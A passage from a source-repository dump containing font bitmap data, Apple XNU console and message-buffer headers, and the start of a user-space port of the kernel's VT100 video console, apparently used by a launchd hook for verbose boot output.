*/ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 184 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x30, 0x1e, 0x00, /* 185 */ 0x00, 0x0c, 0x0e, 0x0c, 0x0c, 0x0c, 0x1e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 186 */ 0x00, 0x1e, 0x33, 0x33, 0x33, 0x33, 0x1e, 0x00, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 187 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x1b, 0x36, 0x6c, 0x6c, 0x36, 0x1b, 0x00, 0x00, 0x00, 0x00, 0x00, /* 188 */ 0x00, 0x10, 0x1c, 0x18, 0x18, 0x18, 0x00, 0x7f, 0x00, 0x18, 0x1c, 0x1a, 0x3e, 0x18, 0x00, 0x00, /* 189 */ 0x00, 0x10, 0x1c, 0x18, 0x18, 0x18, 0x00, 0x7f, 0x00, 0x1c, 0x36, 0x18, 0x0c, 0x3e, 0x00, 0x00, /* 190 */ 0x00, 0x1c, 0x36, 0x18, 0x36, 0x1c, 0x00, 0x7f, 0x00, 0x18, 0x1c, 0x1a, 0x3e, 0x18, 0x00, 0x00, /* 191 */ 0x00, 0x00, 0x00, 0x00, 0x0c, 0x0c, 0x00, 0x0c, 0x0c, 0x06, 0x06, 0x03, 0x63, 0x3e, 0x00, 0x00, /* 192 */ 0x0c, 0x18, 0x3e, 0x63, 0x63, 0x63, 0x7f, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 193 */ 0x18, 0x0c, 0x3e, 0x63, 0x63, 0x63, 0x7f, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 194 */ 0x08, 0x14, 0x3e, 0x63, 0x63, 0x63, 0x7f, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 195 */ 0x6e, 0x3b, 0x3e, 0x63, 0x63, 0x63, 0x7f, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 196 */ 0x36, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x7f, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 197 */ 0x1c, 0x36, 0x3e, 0x63, 0x63, 0x63, 0x7f, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 198 */ 0x00, 0x00, 0xfe, 0x33, 0x33, 0x33, 0xff, 0x33, 0x33, 0x33, 0x33, 0xf3, 0x00, 0x00, 0x00, 0x00, /* 199 */ 0x00, 0x00, 0x3c, 0x66, 0x03, 0x03, 0x03, 0x03, 0x03, 0x03, 0x66, 0x3c, 0x18, 0x30, 0x1e, 0x00, /* 200 */ 0x0c, 0x18, 0x7f, 0x03, 0x03, 0x03, 0x3f, 0x03, 0x03, 0x03, 0x03, 0x7f, 0x00, 0x00, 0x00, 0x00, /* 201 */ 0x18, 0x0c, 0x7f, 0x03, 0x03, 0x03, 0x3f, 0x03, 0x03, 0x03, 0x03, 0x7f, 0x00, 0x00, 0x00, 0x00, /* 202 */ 0x08, 0x14, 0x7f, 0x03, 0x03, 0x03, 0x3f, 0x03, 0x03, 0x03, 0x03, 0x7f, 0x00, 0x00, 0x00, 0x00, /* 203 */ 0x36, 0x00, 0x7f, 0x03, 0x03, 0x03, 0x3f, 0x03, 0x03, 0x03, 0x03, 0x7f, 0x00, 0x00, 0x00, 0x00, /* 204 */ 0x0c, 0x18, 0x3c, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 205 */ 0x30, 0x18, 0x3c, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 206 */ 0x18, 0x24, 0x3c, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 207 */ 0x66, 0x00, 0x3c, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 208 */ 0x00, 0x00, 0x1e, 0x36, 0x66, 0x66, 0x6f, 0x66, 0x66, 0x66, 0x36, 0x1e, 0x00, 0x00, 0x00, 0x00, /* 209 */ 0x6e, 0x3b, 0x63, 0x63, 0x67, 0x6f, 0x6f, 0x7b, 0x7b, 0x73, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 210 */ 0x06, 0x0c, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 211 */ 0x30, 0x18, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 212 */ 0x08, 0x14, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 213 */ 0x6e, 0x3b, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 214 */ 0x36, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 215 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x3c, 0x18, 0x3c, 0x66, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 216 */ 0x00, 0x20, 0x3e, 0x73, 0x73, 0x6b, 0x6b, 0x6b, 0x6b, 0x67, 0x67, 0x3e, 0x02, 0x00, 0x00, 0x00, /* 217 */ 0x0c, 0x18, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 218 */ 0x18, 0x0c, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 219 */ 0x08, 0x14, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 220 */ 0x36, 0x00, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 221 */ 0x30, 0x18, 0xc3, 0xc3, 0x66, 0x66, 0x3c, 0x3c, 0x18, 0x18, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, /* 222 */ 0x00, 0x00, 0x0f, 0x06, 0x3e, 0x66, 0x66, 0x66, 0x66, 0x3e, 0x06, 0x0f, 0x00, 0x00, 0x00, 0x00, /* 223 */ 0x00, 0x00, 0x1e, 0x33, 0x33, 0x1b, 0x33, 0x63, 0x63, 0x63, 0x63, 0x3b, 0x00, 0x00, 0x00, 0x00, /* 224 */ 0x00, 0x0c, 0x18, 0x30, 0x00, 0x3e, 0x60, 0x7e, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 225 */ 0x00, 0x30, 0x18, 0x0c, 0x00, 0x3e, 0x60, 0x7e, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 226 */ 0x00, 0x08, 0x1c, 0x36, 0x00, 0x3e, 0x60, 0x7e, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 227 */ 0x00, 0x00, 0x6e, 0x3b, 0x00, 0x3e, 0x60, 0x7e, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 228 */ 0x00, 0x00, 0x36, 0x36, 0x00, 0x3e, 0x60, 0x7e, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 229 */ 0x00, 0x1c, 0x36, 0x1c, 0x00, 0x3e, 0x60, 0x7e, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 230 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x6e, 0xdb, 0xd8, 0xfe, 0x1b, 0xdb, 0x76, 0x00, 0x00, 0x00, 0x00, /* 231 */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x63, 0x03, 0x03, 0x03, 0x63, 0x3e, 0x18, 0x30, 0x1e, 0x00, /* 232 */ 0x00, 0x0c, 0x18, 0x30, 0x00, 0x3e, 0x63, 0x63, 0x7f, 0x03, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 233 */ 0x00, 0x30, 0x18, 0x0c, 0x00, 0x3e, 0x63, 0x63, 0x7f, 0x03, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 234 */ 0x00, 0x08, 0x1c, 0x36, 0x00, 0x3e, 0x63, 0x63, 0x7f, 0x03, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 235 */ 0x00, 0x00, 0x36, 0x36, 0x00, 0x3e, 0x63, 0x63, 0x7f, 0x03, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 236 */ 0x00, 0x06, 0x0c, 0x18, 0x00, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x38, 0x00, 0x00, 0x00, 0x00, /* 237 */ 0x00, 0x18, 0x0c, 0x06, 0x00, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x38, 0x00, 0x00, 0x00, 0x00, /* 238 */ 0x00, 0x08, 0x1c, 0x36, 0x00, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x38, 0x00, 0x00, 0x00, 0x00, /* 239 */ 0x00, 0x00, 0x36, 0x36, 0x00, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x38, 0x00, 0x00, 0x00, 0x00, /* 240 */ 0x00, 0x00, 0x2c, 0x18, 0x34, 0x60, 0x7c, 0x66, 0x66, 0x66, 0x66, 0x3c, 0x00, 0x00, 0x00, 0x00, /* 241 */ 0x00, 0x00, 0x6e, 0x3b, 0x00, 0x3b, 0x67, 0x63, 0x63, 0x63, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, /* 242 */ 0x00, 0x06, 0x0c, 0x18, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 243 */ 0x00, 0x30, 0x18, 0x0c, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 244 */ 0x00, 0x08, 0x1c, 0x36, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 245 */ 0x00, 0x00, 0x6e, 0x3b, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 246 */ 0x00, 0x00, 0x36, 0x36, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x00, 0x00, 0x00, /* 247 */ 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x00, 0x7e, 0x00, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, /* 248 */ 0x00, 0x00, 0x00, 0x00, 0x20, 0x3e, 0x73, 0x6b, 0x6b, 0x6b, 0x67, 0x3e, 0x02, 0x00, 0x00, 0x00, /* 249 */ 0x00, 0x06, 0x0c, 0x18, 0x00, 0x63, 0x63, 0x63, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 250 */ 0x00, 0x30, 0x18, 0x0c, 0x00, 0x63, 0x63, 0x63, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 251 */ 0x00, 0x08, 0x1c, 0x36, 0x00, 0x63, 0x63, 0x63, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 252 */ 0x00, 0x00, 0x36, 0x36, 0x00, 0x63, 0x63, 0x63, 0x63, 0x63, 0x73, 0x6e, 0x00, 0x00, 0x00, 0x00, /* 253 */ 0x00, 0x30, 0x18, 0x0c, 0x00, 0x63, 0x63, 0x36, 0x36, 0x1c, 0x1c, 0x0c, 0x0c, 0x06, 0x03, 0x00, /* 254 */ 0x00, 0x00, 0x0f, 0x06, 0x06, 0x3e, 0x66, 0x66, 0x66, 0x66, 0x66, 0x3e, 0x06, 0x06, 0x0f, 0x00, /* 255 */ 0x00, 0x00, 0x36, 0x36, 0x00, 0x63, 0x63, 0x36, 0x36, 0x1c, 0x1c, 0x0c, 0x0c, 0x06, 0x03, 0x00 }; #define ISO_CHAR_MIN 0x00 #define ISO_CHAR_MAX 0xFF #define ISO_CHAR_WIDTH 8 #define ISO_CHAR_HEIGHT 16 ================================================ FILE: RootHelperSample/launchdshim/launchdhook/verbose/console/msgbuf.h ================================================ /* * Copyright (c) 2000-2010 Apple, Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. The rights granted to you under the License * may not be used to create, or enable the creation or redistribution of, * unlawful or unlicensed copies of an Apple operating system, or to * circumvent, violate, or enable the circumvention or violation of, any * terms of an Apple operating system software license agreement. * * Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ /* Copyright (c) 1995 NeXT Computer, Inc. All Rights Reserved */ /* * Copyright (c) 1981, 1984, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)msgbuf.h 8.1 (Berkeley) 6/2/93 */ #ifndef _SYS_MSGBUF_H_ #define _SYS_MSGBUF_H_ #include #define MAX_MSG_BSIZE (1*1024*1024) struct msgbuf { #define MSG_MAGIC 0x063061 int msg_magic; int msg_size; int msg_bufx; /* write pointer */ int msg_bufr; /* read pointer */ char *msg_bufc; /* buffer */ }; #ifdef XNU_KERNEL_PRIVATE __BEGIN_DECLS extern struct msgbuf *msgbufp; extern struct msgbuf *aslbufp; extern void log_putc(char); extern void log_putc_locked(struct msgbuf *, char); extern int log_setsize(int size); extern int log_dmesg(user_addr_t, uint32_t, int32_t *); __END_DECLS #endif /* XNU_KERNEL_PRIVATE */ #endif /* !_SYS_MSGBUF_H_ */ ================================================ FILE: RootHelperSample/launchdshim/launchdhook/verbose/console/serial_protos.h ================================================ /* * Copyright (c) 2005-2006 Apple Computer, Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. The rights granted to you under the License * may not be used to create, or enable the creation or redistribution of, * unlawful or unlicensed copies of an Apple operating system, or to * circumvent, violate, or enable the circumvention or violation of, any * terms of an Apple operating system software license agreement. * * Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ /* * @OSF_COPYRIGHT@ */ /* * @APPLE_FREE_COPYRIGHT@ */ #ifndef _CONSOLE_SERIAL_PROTOS_H_ #define _CONSOLE_SERIAL_PROTOS_H_ #ifdef __cplusplus extern "C" { #endif void serial_keyboard_init(void); void serial_keyboard_start(void) __dead2; void serial_keyboard_poll(void) __dead2; extern uint32_t serialmode; #define SERIALMODE_OUTPUT 0x1 #define SERIALMODE_INPUT 0x2 #define SERIALMODE_SYNCDRAIN 0x4 #define SERIALMODE_BASE_TTY 0x8 /* Load Base/Recovery/FVUnlock TTY */ extern uint32_t cons_ops_index; extern const uint32_t nconsops; extern unsigned int disable_serial_output; #if defined(__arm__) || defined(__arm64__) /* ARM64_TODO */ extern void *console_cpu_alloc(boolean_t); extern void console_cpu_free(void *); void console_init(void); #endif int _serial_getc(int unit, int line, boolean_t wait, boolean_t raw); struct console_ops { void (*putc)(int, int, int); int (*getc)(int, int, boolean_t, boolean_t); }; boolean_t console_is_serial(void); int switch_to_serial_console(void); int switch_to_video_console(void); void switch_to_old_console(int old_console); #define SERIAL_CONS_OPS 0 #define VC_CONS_OPS 1 #ifdef XNU_KERNEL_PRIVATE #define SERIAL_CONS_BUF_SIZE 256 struct console_printbuf_state { int pos; int total; int flags; #define CONS_PB_WRITE_NEWLINE 0x1 #define CONS_PB_CANBLOCK 0x2 char str[SERIAL_CONS_BUF_SIZE]; }; extern int console_printbuf_drain_initialized; void console_printbuf_state_init(struct console_printbuf_state * data, int write_on_newline, int can_block); void console_printbuf_putc(int ch, void *arg); void console_printbuf_clear(struct console_printbuf_state * info); int console_write_try(char * str, int size); #endif /* XNU_KERNEL_PRIVATE */ #ifdef __cplusplus } #endif #endif /* _CONSOLE_SERIAL_PROTOS_H_ */ ================================================ FILE: RootHelperSample/launchdshim/launchdhook/verbose/console/video_console.c ================================================ /* * Copyright (c) 2000-2020 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. The rights granted to you under the License * may not be used to create, or enable the creation or redistribution of, * unlawful or unlicensed copies of an Apple operating system, or to * circumvent, violate, or enable the circumvention or violation of, any * terms of an Apple operating system software license agreement. * * Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ /* * @OSF_FREE_COPYRIGHT@ * */ /* * @APPLE_FREE_COPYRIGHT@ */ /* * NetBSD: ite.c,v 1.16 1995/07/17 01:24:34 briggs Exp * * Copyright (c) 1988 University of Utah. * Copyright (c) 1990, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * the Systems Programming Group of the University of Utah Computer * Science Department. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * from: Utah $Hdr: ite.c 1.28 92/12/20$ * * @(#)ite.c 8.2 (Berkeley) 1/12/94 */ /* * ite.c * * The ite module handles the system console; that is, stuff printed * by the kernel and by user programs while "desktop" and X aren't * running. Some (very small) parts are based on hp300's 4.4 ite.c, * hence the above copyright. * * -- Brad and Lawrence, June 26th, 1994 * */ #include "video_console.h" #include "video_scroll.c" #include "serial_protos.h" //#include //#include //#include //#include //#include //#include //#include //#include //#include //#include //#include #include #include #include #include #include #include "iso_font.c" #if defined(XNU_TARGET_OS_OSX) #include "progress_meter_data.c" #endif #include "msgbuf.h" #define kPEGraphicsMode 1 #define kPETextMode 2 #define kPETextScreen 3 #define kPEAcquireScreen 4 #define kPEReleaseScreen 5 #define kPEEnableScreen 6 #define kPEDisableScreen 7 #define kPEBaseAddressChange 8 #define kPERefreshBootGraphics 9 #if __has_attribute(fallthrough) #define OS_FALLTHROUGH __attribute__((__fallthrough__)) #else #define OS_FALLTHROUGH #endif #define NEVER 0 #define ALWAYS 1 #define MACRO_BEGIN do { #define MACRO_END } while (NEVER) #define console_is_serial() 0 int switch_to_serial_console() {return 0;} #define KHEAP_DATA_BUFFERS 0 #define Z_WAITOK #define kheap_alloc(a, b, c) malloc(b) #define kheap_free(a, b, c) free(b) #define LCK_GRP_NULL 0 #define decl_simple_lock_data(a, b) #define simple_lock_init(a, b) #define simple_lock(a, b) #define simple_unlock(a) typedef unsigned spl_t; #define splhigh() (spl_t) 0 #define splx(x) struct thread_call {}; typedef struct thread_call thread_call_data_t; #define thread_call_setup(a, b, c) #define thread_call_enter_delayed(a, b) // TODO: implement for the progress bar #define thread_call_cancel(a) #define os_add_overflow __builtin_add_overflow // FIXME correct value? #define rtclock_sec_divisor 10 enum { kPEScaleFactorUnknown = 0, kPEScaleFactor1x = 1, kPEScaleFactor2x = 2, }; struct PE_Video { unsigned long v_baseAddr; /* Base address of video memory */ unsigned long v_rowBytes; /* Number of bytes per pixel row */ unsigned long v_width; /* Width */ unsigned long v_height; /* Height */ unsigned long v_depth; /* Pixel Depth */ unsigned long v_display; /* Text or Graphics */ char v_pixelFormat[64]; unsigned long v_offset; /* offset into video memory to start at */ unsigned long v_length; /* length of video memory (0 for v_rowBytes * v_height) */ unsigned char v_rotate; /* Rotation: 0:normal, 1:right 90, 2:left 180, 3:left 90 */ unsigned char v_scale; /* Scale Factor for both X & Y */ char reserved1[2]; #ifdef __LP64__ long reserved2; #else long v_baseAddrHigh; #endif }; typedef struct PE_Video PE_Video; void clock_deadline_for_periodic_event( uint64_t interval, uint64_t abstime, uint64_t *deadline) { assert(interval != 0); // *deadline += interval; if (os_add_overflow(*deadline, interval, deadline)) { *deadline = UINT64_MAX; } if (*deadline <= abstime) { // *deadline = abstime + interval; if (os_add_overflow(abstime, interval, deadline)) { *deadline = UINT64_MAX; } abstime = mach_absolute_time(); if (*deadline <= abstime) { // *deadline = abstime + interval; if (os_add_overflow(abstime, interval, deadline)) { *deadline = UINT64_MAX; } } } } void clock_interval_to_absolutetime_interval(uint32_t interval, uint32_t scale_factor, uint64_t * result) { uint64_t nanosecs = (uint64_t) interval * scale_factor; uint64_t t64; *result = (t64 = nanosecs / NSEC_PER_SEC) * rtclock_sec_divisor; nanosecs -= (t64 * NSEC_PER_SEC); *result += (nanosecs * rtclock_sec_divisor) / NSEC_PER_SEC; } void clock_interval_to_deadline( uint32_t interval, uint32_t scale_factor, uint64_t *result) { uint64_t abstime; clock_interval_to_absolutetime_interval(interval, scale_factor, &abstime); if (os_add_overflow(mach_absolute_time(), abstime, result)) { *result = UINT64_MAX; } } /* * Generic Console (Front-End) * --------------------------- */ struct vc_info vinfo; void noroot_icon_test(void); //extern int disableConsoleOutput; static boolean_t gc_enabled = FALSE; static boolean_t gc_initialized = FALSE; static boolean_t vm_initialized = FALSE; static struct { void (*initialize)(struct vc_info * info); void (*enable)(boolean_t enable); void (*paint_char)(unsigned int xx, unsigned int yy, unsigned char ch, int attrs, unsigned char ch_previous, int attrs_previous); void (*clear_screen)(unsigned int xx, unsigned int yy, unsigned int top, unsigned int bottom, int which); void (*scroll_down)(int num, unsigned int top, unsigned int bottom); void (*scroll_up)(int num, unsigned int top, unsigned int bottom); void (*hide_cursor)(unsigned int xx, unsigned int yy); void (*show_cursor)(unsigned int xx, unsigned int yy); void (*update_color)(int color, boolean_t fore); } gc_ops; static unsigned char *gc_buffer_attributes; static unsigned char *gc_buffer_characters; static unsigned char *gc_buffer_colorcodes; static unsigned char *gc_buffer_tab_stops; static uint32_t gc_buffer_columns; static uint32_t gc_buffer_rows; static uint32_t gc_buffer_size; //LCK_GRP_DECLARE(vconsole_lck_grp, "vconsole"); //static lck_ticket_t vcputc_lock; #define VCPUTC_LOCK_INIT() \ MACRO_BEGIN \ /* lck_ticket_init(&vcputc_lock, &vconsole_lck_grp); */ \ MACRO_END #define VCPUTC_LOCK_LOCK() \ MACRO_BEGIN \ /* lck_ticket_lock(&vcputc_lock, &vconsole_lck_grp); */ \ MACRO_END #define VCPUTC_LOCK_UNLOCK() \ MACRO_BEGIN \ /* lck_ticket_unlock(&vcputc_lock); */ \ MACRO_END /* # Attribute codes: # 00=none 01=bold 04=underscore 05=blink 07=reverse 08=concealed # Text color codes: # 30=black 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 37=white # Background color codes: # 40=black 41=red 42=green 43=yellow 44=blue 45=magenta 46=cyan 47=white */ #define ATTR_NONE 0 #define ATTR_BOLD 1 #define ATTR_UNDER 2 #define ATTR_REVERSE 4 #define COLOR_BACKGROUND 0 #define COLOR_FOREGROUND 7 #define COLOR_CODE_GET(code, fore) (((code) & ((fore) ? 0xF0 : 0x0F)) >> ((fore) ? 4 : 0)) #define COLOR_CODE_SET(code, color, fore) (((code) & ((fore) ? 0x0F : 0xF0)) | ((color) << ((fore) ? 4 : 0))) static unsigned char gc_color_code; /* VT100 state: */ #define MAXPARS 16 static unsigned int gc_x, gc_y, gc_savex, gc_savey; static unsigned int gc_par[MAXPARS], gc_numpars, gc_hanging_cursor, gc_attr, gc_saveattr; /* VT100 scroll region */ static unsigned int gc_scrreg_top, gc_scrreg_bottom; enum vt100state_e { ESnormal, /* Nothing yet */ ESesc, /* Got ESC */ ESsquare, /* Got ESC [ */ ESgetpars, /* About to get or getting the parameters */ ESgotpars, /* Finished getting the parameters */ ESfunckey, /* Function key */ EShash, /* DEC-specific stuff (screen align, etc.) */ ESsetG0, /* Specify the G0 character set */ ESsetG1, /* Specify the G1 character set */ ESask, EScharsize, ESignore /* Ignore this sequence */ } gc_vt100state = ESnormal; enum{ /* secs */ kProgressAcquireDelay = 0, #if !defined(XNU_TARGET_OS_OSX) kProgressReacquireDelay = 5, #else kProgressReacquireDelay = 5, #endif }; static int8_t vc_rotate_matr[4][2][2] = { { { 1, 0 }, { 0, 1 } }, { { 0, 1 }, { -1, 0 } }, { { -1, 0 }, { 0, -1 } }, { { 0, -1 }, { 1, 0 } } }; static int gc_wrap_mode = 1, 